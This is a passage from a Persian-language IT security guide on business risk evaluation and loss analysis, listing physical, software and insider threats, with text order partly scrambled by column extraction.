ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ
ﻛﻠﻴﺎﺕ
ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻱ :ﻣﺮﺯﻫﺎﻱ ﺟﺪﻳﺪ
ﻛﻠﻴﺔ ﺳﺎﺯﻣﺎﻧﻬﺎ -ﭼﻪ ﻛﻮﭼﻚ ﻭ ﭼﻪ ﺑﺰﺭﮒ -ﺩﺭﺣﺎﻝ ﻓﻌﺎﻟﻴـﺖ ﺩﺭ
ﻳﻚ ﻣﺤﻴﻂ ﺟﻬﺎﻧﻲ ﻫﺴﺘﻨﺪ .ﭘﻴﺸﺮﻓﺖ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻭ ﺷـﺒﻜﻪﻫـﺎﻱ
ﺣﻤﻞ ﻭ ﻧﻘﻞ ﺩﺭ ﻗـﺮﻥ ﮔﺬﺷـﺘﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺑﺎﺯﺍﺭﻫـﺎ ﺭﺍ ﺑـﻪ ﻫـﻢ
ﻧﺰﺩﻳﻜﺘﺮ ﻛﺮﺩﻩ ،ﻫﺰﻳﻨﻪﻫﺎ ﺭﺍ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻩ ﻭ ﺑﺎﻋـﺚ ﺷـﺪﻩ
ﺍﻣﺮﻭﺯ ﺑﺘﻮﺍﻥ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺑﺮﺍﻱ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺑﻪ ﺗﻤﺎﻣﻲ ﻧﻘﺎﻁ ﺩﻧﻴـﺎ
ﺍﺭﺳﺎﻝ ﻛﺮﺩ .ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﻣـﺪﻳﺮﺍﻥ ﺑﺎﻳـﺪ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ
ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﺮﺍﻱ ﻣﺆﺳﺴﻪﻫﺎﻳﺸﺎﻥ ﺩﺭﻧﻈـﺮ ﺑﮕﻴﺮﻧـﺪ .ﺍﺯ ﺍﻧﺘﻬـﺎﻱ
ﺩﻫﺔ ۱۹۹۰ﺑﻪ ﺑﻌﺪ ﺣﻤـﻼﺕ ﺷـﺪﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ
ﺻﻮﺭﺕ ﭘﺬﻳﺮﻓﺖ )ﻧﻈﻴﺮ ﺣﻤﻠﻪ ﺑﻪ ﻣﺮﻛﺰ ﺗﺠﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺩﺭ ﺳـﺎﻝ .(۲۰۰۱
ﻼ
ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﭼﻨﻴﻦ ﺭﺧﺪﺍﺩﻫﺎﻳﻲ ،ﻧﻴﺎﺯ ﺑﻪ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻛـﺎﻣ ﹰ
ﺭﻭﺷﻦ ﺷﺪ :ﺿﺮﻭﺭﺕ ﺣﻀﻮﺭ ﭘﻠﻴﺲ ﺩﺭ ﺍﻃﺮﺍﻑ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ،ﻛﻨﺘﺮﻝ
ﻭﺭﻭﺩ ﺑﻪ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ،ﻃﺮﺍﺣﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺻـﺤﻴﺢ ﺑـﺮﺍﻱ ﺗﺨﻠﻴـﺔ
ﻣﺤﻴﻂ ﺩﺭﺻﻮﺭﺕ ﻭﻗـﻮﻉ ﺣﺎﺩﺛـﻪ ،ﻭ ﺗﻮﺳـﻌﻪ ﺩﺍﺩﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ
ﻣﻄﻤﺌﻦﺗﺮ ﺑﺎ ﻣﻘﺎﻣﺎﺕ ﻣﺤﻠﻲ ﻭ ﻛﺸﻮﺭﻱ.
ﺩﺭ ﻗﺴﻤﺖ ﻓﻨﻲ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻇﺮ ﺑﺮﺭﺳﻲ ﺗﻬﺪﻳـﺪﻫﺎﻳﻲ ﻛـﻪ ﺍﺯ
ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﻣﺘﻮﺟﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻛﺎﺭﺑﺮﺩﻱ ،ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ،ﻭ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﮔﺮﻭﻫﻬﺎ ﺭﺍ ﺑﻪ ﻫﻢ
Risk Evaluation
Loss Analysis
53
54
ﺧﻮﺩ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ
ﺍﮔﺮﭼــﻪ ﻃﺮﺣﻬــﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻱ ﻣــﺸﺘﺮﻛﻲ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺯﻱ
ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ،ﺍﻣــﺎ ﺩﺍﺷــﺘﻦ
ﺗﺼﻮﻳﺮ ﻛﺎﻣﻠﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻭ ﻗﺎﻟﺐ ﻓﻌﺎﻟﻴﺖ ﺁﻥ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﻳـﻚ
ﻲ ﺧﻮﺏ ،ﻻﺯﻡ ﺍﺳﺖ .ﻣﺠﻤﻮﻋﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ
ﻃﺮﺡ ﺍﻣﻨﻴﺘ ﹺ
ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﺷﺮﻛﺘﻲ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺩﻓﻊ ﺿﺎﻳﻌﺎﺕ ﺧﻄﺮﻧـﺎﻙ
ﻳﺎ ﻣﻮﺍﺩ ﺯﻳﺴﺘﻲ ﻓﻌﺎﻝ ﺍﺳﺖ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎ ﹺﺯ ﻳﻚ
ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻟﻮﺍﺯﻡ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻓﺮﺁﻳﻨـﺪ
ﻲ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﺓ ﺍﻣﻨﻴﺘﻲ ﺗﻮﺳﻂ ﻣﺪﻳﺮﻳﺖ ،ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ
ﺷﻨﺎﺳﺎﻳ ﹺ
ﭘﻨﺞ ﺳﺌﻮﺍﻝ ﺯﻳﺮ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ:
.۱
ﺍﺻﻠﻲﺗﺮﻳﻦ ﻣﺤﺼﻮﻝ ﻳﺎ ﺧﺪﻣﺖ ﺳـﺎﺯﻣﺎﻥ ﭼﻴـﺴﺖ؟ ﺍﮔـﺮ
ﭼﻨﺪ ﭘﺎﺳﺦ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺳﻌﻲ ﻛﻨﻴﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻭﻟﻮﻳـﺖﺑﻨـﺪﻱ
ﻧﻤﺎﻳﻴﺪ.
.۲
ﻣﻨﺎﺑﻊ ﺍﺻﻠﻲ ﺩﺭﺁﻣﺪ ﻭ ﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﻛﺪﺍﻣﻨﺪ؟
.۳
ﺳﺎﺧﺘﺎﺭ ﺳـﺎﺯﻣﺎﻥ ﭼﮕﻮﻧـﻪ ﺍﺳـﺖ؟ ﺑﺨـﺸﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﻭ
ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﺻﻠﻲ ﻫﺮﻳﻚ ﻛﺪﺍﻣﻨﺪ؟ ﺍﻳﻦ ﺑﺨﺸﻬﺎ ﭼﮕﻮﻧﻪ
ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨـﺪ؛ ﭼﮕﻮﻧـﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ
ﻣﻲﻧﻤﺎﻳﻨﺪ؛ ﻭ ﭼﮕﻮﻧﻪ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣﺠﻤﻮﻋـﺔ ﻭﺍﺣـﺪ ﺑـﻪ
ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ؟
Intellectual Property
55
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ٥٣ﻭ ﺗﺤﻠﻴـﻞ ﺯﻳـﺎﻥ ٥٤ﻭ ﺁﺳـﻴﺒﻬﺎﻱ
ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺗﺠﺎﺭﻱ ﺑﺮﺭﺳﻲ ﻣﻲﺷـﻮﻧﺪ؛ ،ﻣﻨـﺸﺄ ،ﻋﻤﻠﻜـﺮﺩ
ﻣﺤﺘﻤﻞ ،ﻭ ﺷﺪﺕ ﺍﺛـﺮﺍﺕ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮ
ﻲ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﻣﺮﻩ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧـﺪ؛ ﻧﻜـﺎﺕ ﺍﺻـﻠ ﹺ
ﻳﻚ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺻﺤﻴﺢ ﺗﺸﺮﻳﺢ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺻﻮﻝ ﺍﺳﺎﺳـﻲ
ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻭﺍﻗﻌﻲ ﻧﻴـﺰ ﻣـﻮﺭﺩ
ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﻣﺘﺼﻞ ﻣﻲﻛﻨﻨﺪ ﺍﻏﺎﺯ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻣﺤﻴﻂ ﻛﺎﺭ ،ﺩﺍﺩﻩﻫـﺎﻱ ﺧـﺎﻡ
ﻧﻈﻴﺮ ﺳﻮﺍﺑﻖ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺮﺍﻱ ﺭﻗﺒـﺎ ﻭ
ﺗﺒﻬﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﻭ ﺑﻪ ﺗﻮﺟﻪ ﺧﺎﺹ ﻧﻴﺎﺯ
٥٥
ﺩﺍﺭﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﭘﻴﺸﺮﻓﺘﻪﺗﺮ ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨـﻮﻱ
ﻱ ﻣﻨﺤﺼﺮ ﺑﻔـﺮﺩ
ﻧﻈﻴﺮ ﺍﺳﻨﺎﺩ ﺗﺤﻘﻴﻘﺎﺕ ﻋﻠﻤﻲ ﻳﺎ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﻛﺎﺭ ﹺ
ﻲ ﻭﻳـﮋﻩ ﻫـﺴﺘﻨﺪ.
ﺍﺭﺯﺵ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ﻭ ﻧﻴﺎﺯﻣﻨﺪ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﺍﻣﻨﻴﺘ ﹺ
ﺩﺭ ﺩﻧﻴﺎﻳﻲ ﻛﻪ ﺭﻭﺯ ﺑﻪ ﺭﻭﺯ ﺭﻗﺎﺑﺖ ﺩﺭ ﺁﻥ ﺷﺪﺕ ﻣﻲﮔﻴﺮﺩ ،ﺳـﺮﻗﺖ
ﺩﺍﺩﻩﻫﺎﻱ ﺧﺎﻡ ﻭ ﺩﺍﺭﺍﺋﻴﻬﺎﻱ ﻓﻜﺮﻱ ﺍﺯ ﻃﺮﻳﻖ ﺭﺍﻳﺎﻧﻪ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ
ﺍﺳﺖ .ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ "ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﻴﺸﮕﻴﺮﺍﻧﻪ" ﻛﻪ ﺩﺭ ﻧﮕﺮﺵ ﻛﻠـﻲ
ﻭ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﺪﻳﺮﻳﺖ ﻣﻮﺭﺩ ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ،ﺁﻣـﻮﺯﺵ ﻭ
ﻫﻮﺷﻴﺎﺭﺳﺎﺯﻱ ﻛﺎﺭﻛﻨﺎﻥ ،ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﻔﺎﻑ ﺩﺭﻭﻥ ﺳـﺎﺯﻣﺎﻥ ،ﺑـﻪ
ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻧﺎﺷـﻲ ﺍﺯ ﺗﺨﻠﻔـﺎﺕ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻭ ﺍﻣﻨﻴـﺖ
ﺳﺎﻳﺒﺮ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ.
١٣٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
.۴
ﻛﺪﺍﻡ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻫﺮ ﺑﺨﺶ ﺣﺴﺎﺳﺘﺮ ﺍﺳﺖ ﻭ ﺍﺯ ﭼـﻪ
ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻭ ﺗﻮﺯﻳﻊ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺧﺎﺭﺝ
ﻭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؟
.۵
ﻣﺸﺘﺮﻳﺎﻥ ،ﺷـﺮﻛﺎ ﻭ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺳـﺎﺯﻣﺎﻥ ﭼـﻪ ﻛـﺴﺎﻧﻲ
ﻫﺴﺘﻨﺪ ﻭ ﻧﺤﻮﺓ ﺗﻌﺎﻣﻞ ﺁﻧﻬﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻥ ﭼﮕﻮﻧﻪ ﺍﺳﺖ؟
ﺍﻃﻼﻋﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺮﺍﻱ ﭘﺎﺳـﺦ ﺩﺍﺩﻥ ﺑـﻪ ﺍﻳـﻦ ﺳـﺆﺍﻻﺕ ﺭﺍ
ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﮔﻔﺘﮕﻮ ﺑﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ )ﺑﺨﺼﻮﺹ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﻓﻨـﺎﻭﺭﻱ
ﺍﻃﻼﻋﺎﺕ( ،ﻣﺪﻳﺮﺍﻥ ﻭ ﻫﻴﺄﺕ ﻣﺪﻳﺮﻩ ﺷﺮﻛﺖ ﺑﺪﺳﺖ ﺁﻭﺭﺩ .ﺍﺭﺯﻳـﺎﺑﻲ
ﻧﻈﺮﺍﺕ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻣﻮﺭﺩ ﻣﺴﺎﺋﻞ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻛﺸﻒ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳـﺪ ﺷـﻮﺩ .ﺩﺳـﺖ ﺁﺧـﺮ
ﺍﻳﻨﻜﻪ ﺗﻴﻤﻲ ﻛﻪ ﺑﻪ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﭘـﺮﺩﺍﺯﺩ ﺑﺎﻳـﺪ ﺑـﺎ
ﺍﺩﺑﻴﺎﺕ ﮔﺰﺍﺭﺷﺎﺕ ﺭﺳﺎﻧﻪﻫﺎ ﺩﺭ ﻣﻮﺭﺩ ﺷﺮﻛﺖ ﺁﺷﻨﺎ ﺑﺎﺷـﺪ .ﻧﻈـﺮﺍﺕ
ﻋﻤﻮﻣﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣـﺆﺛﺮ ﺑﺎﺷـﺪ؛ ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﺷـﺮﻛﺖ ﺩﺭ
ﺻﻨﻌﺘﻲ ﺑﺤﺚﺍﻧﮕﻴﺰ ﻳﺎ ﺩﺭ ﺟﺎﻳﮕﺎﻫﻲ ﺣﺴﺎﺱ ﻓﻌﺎﻟﻴﺖ ﻛﻨـﺪ ،ﻭ ﻳـﺎ
ﮔﺰﺍﺭﺷﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺩﺭ ﻧﺸﺮﻳﺎﺕ ﻇـﺎﻫﺮ ﺷـﺪﻩ
ﺑﺎﺷﺪ.
ﺩﺷﻤﻦ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ:
ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ
ﺯﻣﺎﻧﻴﻜــﻪ ﺷــﺮﻛﺖ ﺳــﺎﺧﺘﺎﺭ ﻭ ﻋﻤﻠﻜــﺮﺩ ﺧــﻮﺩ ﺭﺍ ﺍﺭﺯﻳــﺎﺑﻲ ﻛــﺮﺩ،
ﻣﻮﻗﻌﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺷﺮﺣﻲ ﺍﺯ ﻧﻘـﺎﻁ ﺑـﺎﻟﻘﻮﺓ ﻗـﻮﺕ ﻭ
ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﺁﻥ ﺑﺪﺳـﺖ ﻣـﻲﺁﻳـﺪ .ﺩﺭ ﺍﺑﺘـﺪﺍ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺭﻭﻱ
ﺗﻬﺪﻳــﺪﺍﺕ ﻛﻠــﻲ ﻣﺘﻤﺮﻛــﺰ ﺷــﻮﻳﻢ .ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ
ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪﻧﺪ ،ﺍﺭﺯﻳﺎﺑﻲ ﺳﻄﺢ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺩﺭ
ﻓﻌﺎﻟﻴـﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺧﻮﺍﻫﺪ
ﺑﻮﺩ.
ﺗﻬﺪﻳﺪﺍﺕ ﻛﻠﻲ ﻫﺮ ﺷﺮﻛﺖ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺳﻤﻲ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﺗﻬﺪﻳﺪﺍﺕ ﻓﻴﺰﻳﻜﻲ
•
•
•
•
•
•
ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ )ﺁﺗﺶﺳﻮﺯﻱ ،ﺯﻟﺰﻟﻪ ،ﻃﻮﻓﺎﻧﻬﺎﻱ ﺷﺪﻳﺪ ﻭ ﺳﻴﻞ(؛
ﺩﺯﺩﻱ؛
ﺗﺨﺮﻳﺐ؛
ﺗﺪﺍﺧﻠﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛
ﺗﺨﺮﻳﺐ ﺷﺒﻜﻪ؛ ﻭ
ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ.
ﺗﻬﺪﻳﺪﺍﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ
•
•
•
•
ﻧﻔﻮﺫ ﺑﻪ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛
ﺑﺮﺍﻓﺰﺍﺭﻫﺎ )ﻭﻳﺮﻭﺳﻬﺎ ،ﺗﺮﺍﻭﺍﻫﺎ ،ﻛﺮﻣﻬﺎ(؛
ﺍﻧﺘﺸﺎﺭ ﻏﻴﺮﻣﺠﺎﺯ ﻳﺎ ﺗﺨﺮﻳﺐ ﺩﺍﺩﻩﻫﺎ؛ ﻭ
ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺑﻮﺳﻴﻠﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ .
ﺍﺯ ﻣﻮﺿﻊ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻧﺴﺎﻧﻲ ،ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﻋﻮﺍﻣﻞ ﺧﺮﺍﺑﻜﺎﺭ ﺩﺍﺧﻠـﻲ
ﻭ ﺧﺎﺭﺟﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺍﺧﻠﻲ
ﻣﻲﺗﻮﺍﻧﺪ ﻧﺎﺷﻲ ﺍﺯ ﺧﻄﺎﻱ ﺍﻧﺴﺎﻧﻲ ﺑﺎﺷﺪ :ﻳﻚ ﺳﻬﻞﺍﻧﮕﺎﺭﻱ ﺳﺎﺩﻩ،
ﺑﻲﺗﻮﺟﻬﻲ ،ﻳﺎ ﻋﺪﻡ ﺁﻣﻮﺯﺵ ﻛﺎﻓﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ .ﺩﺭ ﺣﻮﺯﻩﻫﺎﻱ ﺩﻳﮕﺮ
ﺑﺨــﺼﻮﺹ ﺟﺎﺳﻮﺳــﻲ ﺳــﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ،ﻣــﻲﺗــﻮﺍﻥ ﺍﺯ ﻣﻬﻨﺪﺳــﻲ
ﺍﺟﺘﻤﺎﻋﻲ ٥٦ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﺴﻬﻴﻼﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻭ
ﻣﺤﺮﻣﺎﻧﺔ ﺍﻓﺮﺍﺩ ﺁﮔﺎﻩ ﺩﺍﺧﻞ ﺷﺮﻛﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ .ﻣﺠﻤﻮﻋـﻪﺍﻱ
ﻣﻨﺎﺳﺐ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺑﺨـﺶ ﺍﻣﻨﻴـﺖ ﻭ ﺑـﺎ ﻫﻤﻜـﺎﺭﻱ
ﺑﺨﺶ ﭘﺮﺳﻨﻠﻲ ﺍﻳﺠﺎﺩ ﺷﻮﻧﺪ ﺗﺎ ﺑﻪ ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ.
ﺑﺨﺸﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﺮﺳﻨﻠﻲ ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺭﻭﺍﻟﻬـﺎﻱ
ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺍﺧﺮﺍﺝ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮﭼـﻪ
ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻧﮕﻴﺰﺓ ﺷﻔﺎﻓﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ
ﻳﺎﻓﺖ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﻳﻨﮕﻮﻧﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨـﺮﺏ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﻧﻴﺎﺯ ﺑﻪ ﺗﻮﺿﻴﺢ ﻣﻔﺼﻞ ﺩﺍﺭﻧﺪ .ﺩﺳﺘﻪﺑﻨﺪﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ
ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﭼﻨﺪﺍﻥ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﻧﻴـﺴﺖ ،ﻭﻟـﻲ ﺑـﻪ ﻫـﺮ ﺗﺮﺗﻴـﺐ
ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺷﺪﺕ ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻣﺘﻨﺎﻇﺮﹰﺍ ﺁﺳﻴﺐ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ
ﻫﺮ ﺗﻬﺪﻳﺪ ﺑﺼﻮﺭﺕ ﻛﻠﻲ ﺑﺤﺚ ﻛﺮﺩ.
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ) ٥٧ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﺎﺑﺴﺘﺎﻧﻲ ،(٥٨ﻛﺎﺭﻣﻨﺪﺍﻥ ﻳﻚ
ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﺷـﻨﺎﻳﻲ ﺩﺍﺭﻧـﺪ .ﺍﻳـﻦ
ﻻ ﻗـﺼﺪ ﺗﺨﺮﻳـﺐ ﺩﺍﺩﻩﻫـﺎ ﻭ ﺩﺍﺭﺍﺋﻴﻬـﺎﻱ ﺷـﺮﻛﺖ ﺭﺍ
ﺍﻓﺮﺍﺩ ﻣﻌﻤـﻮ ﹰ
ﻧﺪﺍﺭﻧﺪ ،ﺍﻣﺎ ﺍﺯ ﺭﻭﻱ ﻛﻨﺠﻜﺎﻭﻱ ﺳﻌﻲ ﻣﻲﻛﻨﻨـﺪ ﺑـﻪ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ
